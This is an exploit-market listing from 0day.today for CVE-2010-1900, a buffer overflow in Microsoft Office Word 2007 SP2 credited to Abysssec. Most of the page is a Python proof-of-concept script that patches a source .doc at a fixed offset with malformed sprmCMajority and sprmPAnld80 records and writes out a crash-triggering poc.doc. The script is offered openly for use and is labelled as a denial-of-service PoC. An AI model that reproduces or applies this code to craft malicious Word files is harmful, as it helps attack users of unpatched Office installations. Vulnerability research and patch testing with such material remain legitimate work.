[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft Office Word 2007 sprmCMajority Buffer Overflow

Author
Abysssec
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14064
Category
dos / poc
Date add
11-09-2010
Platform
windows
========================================================
Microsoft Office Word 2007 sprmCMajority Buffer Overflow
========================================================

  Title               :  Microsoft Office Word sprmCMajority buffer overflow
  Version             :  Word 2007 SP 2
  Analysis           :  http://www.abysssec.com
  Vendor              :  http://www.microsoft.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec
  CVE                 :  CVE-2010-1900
 
'''
 
import sys
 
def main():
    
    try:
        fdR = open('src.doc', 'rb+')
        strTotal = fdR.read()
        str1 = strTotal[:4082]
        str2 = strTotal[4088:]
         
        sprmCMajority = "\x47\xCA\xFF"    # sprmCMajority 
        sprmPAnld80 = "\x3E\xC6\xFF"    # sprmPAnld80
                 
        fdW= open('poc.doc', 'wb+')
        fdW.write(str1)
        fdW.write(sprmCMajority)
        fdW.write(sprmPAnld80)             
        fdW.write(str2)
         
        fdW.close()
        fdR.close()
        print '[-] Word file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                 
if __name__ == '__main__':
    main()



#  0day.today [2024-05-20]  #